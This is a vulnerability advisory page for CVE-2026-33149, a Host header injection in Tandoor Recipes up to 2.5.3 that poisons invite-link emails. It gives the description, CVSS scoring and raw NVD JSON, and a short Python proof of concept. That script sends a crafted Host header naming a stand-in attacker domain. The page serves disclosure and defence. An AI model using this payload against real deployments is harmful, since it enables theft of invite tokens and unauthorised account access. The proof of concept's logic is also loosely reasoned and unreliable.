Security Vulnerability Report
中文
CVE-2026-33149 CVSS 8.1 HIGH

CVE-2026-33149

Published: 2026-03-26 19:17:03
Last Modified: 2026-04-23 15:11:57
Source: [email protected]

Description

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Versions up to and including 2.5.3 set ALLOWED_HOSTS = '*' by default, which causes Django to accept any value in the HTTP Host header without validation. The application uses request.build_absolute_uri() to generate absolute URLs in multiple contexts, including invite link emails, API pagination, and OpenAPI schema generation. An attacker who can send requests to the application with a crafted Host header can manipulate all server-generated absolute URLs. The most critical impact is invite link poisoning: when an admin creates an invite and the application sends the invite email, the link points to the attacker's server instead of the real application. When the victim clicks the link, the invite token is sent to the attacker, who can then use it at the real application. As of time of publication, it is unknown if a patched version is available.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:tandoor:recipes:*:*:*:*:*:*:*:* - VULNERABLE
Tandoor Recipes <= 2.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://localhost:8000/invite/create/" # Example endpoint malicious_host = "attacker-controlled.com" # Headers demonstrating the Host Header Injection headers = { "Host": malicious_host, "User-Agent": "CVE-2026-33149-POC", "Content-Type": "application/json" } try: # Sending a request that triggers the URL generation logic # This assumes the attacker can trigger an action that leads to an invite generation response = requests.post(target_url, headers=headers) if response.status_code == 200: print(f"[+] Successfully sent request with Host: {malicious_host}") print("[+] If an admin sends an invite now, the email link will contain the malicious host.") else: print("[-] Request failed or endpoint not accessible") except Exception as e: print(f"[!] Error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33149", "sourceIdentifier": "[email protected]", "published": "2026-03-26T19:17:02.967", "lastModified": "2026-04-23T15:11:56.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Versions up to and including 2.5.3 set ALLOWED_HOSTS = '*' by default, which causes Django to accept any value in the HTTP Host header without validation. The application uses request.build_absolute_uri() to generate absolute URLs in multiple contexts, including invite link emails, API pagination, and OpenAPI schema generation. An attacker who can send requests to the application with a crafted Host header can manipulate all server-generated absolute URLs. The most critical impact is invite link poisoning: when an admin creates an invite and the application sends the invite email, the link points to the attacker's server instead of the real application. When the victim clicks the link, the invite token is sent to the attacker, who can then use it at the real application. As of time of publication, it is unknown if a patched version is available."}, {"lang": "es", "value": "Tandoor Recipes es una aplicación para gestionar recetas, planificar comidas y crear listas de la compra. Las versiones hasta la 2.5.3 inclusive establecen ALLOWED_HOSTS = '*' por defecto, lo que provoca que Django acepte cualquier valor en la cabecera HTTP Host sin validación. La aplicación utiliza request.build_absolute_uri() para generar URLs absolutas en múltiples contextos, incluyendo correos electrónicos de enlaces de invitación, paginación de la API y generación de esquemas OpenAPI. Un atacante que pueda enviar solicitudes a la aplicación con una cabecera Host manipulada puede manipular todas las URLs absolutas generadas por el servidor. El impacto más crítico es el envenenamiento de enlaces de invitación: cuando un administrador crea una invitación y la aplicación envía el correo electrónico de invitación, el enlace apunta al servidor del atacante en lugar de a la aplicación real. Cuando la víctima hace clic en el enlace, el token de invitación se envía al atacante, quien luego puede usarlo en la aplicación real. En el momento de la publicación, se desconoce si hay una versión parcheada disponible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-644"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tandoor:recipes:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.5.3", "matchCriteriaId": "DCA6ADE9-290A-4269-83FD-F508CCA327A5"}]}]}], "references": [{"url": "https://github.com/TandoorRecipes/recipes/security/advisories/GHSA-x636-4jx6-xc4w", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/TandoorRecipes/recipes/security/advisories/GHSA-x636-4jx6-xc4w", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.